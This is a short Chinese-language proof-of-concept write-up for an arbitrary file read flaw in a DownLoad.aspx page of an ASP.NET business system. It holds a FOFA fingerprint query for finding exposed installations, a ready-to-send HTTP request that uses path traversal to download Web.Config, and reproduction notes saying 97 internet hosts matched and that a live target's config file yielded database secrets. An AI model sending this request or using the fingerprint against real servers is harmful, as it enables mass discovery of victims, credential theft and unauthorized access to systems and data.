漏洞描述
該漏洞允許攻擊者透過構造特定的請求,讀取伺服器上的任意檔案,從而可能導致敏感資訊洩露。DownLoad.aspx頁面接受一個檔案路徑作為引數,並直接將其傳遞給檔案讀取函式。這個函式沒有經過嚴格的檢查和過濾,攻擊者可以透過構造惡意請求,包含相對路徑或絕對路徑,從而讀取伺服器上的任意檔案
fofa
body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
POC
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
漏洞復現
在fofa中搜尋資產,共有97條資料匹配
訪問目標網站
構造url進行訪問
url雖然跳轉回了登入頁,但是下載了一個web.config檔案
開啟檔案檢視,存在資料庫敏感資訊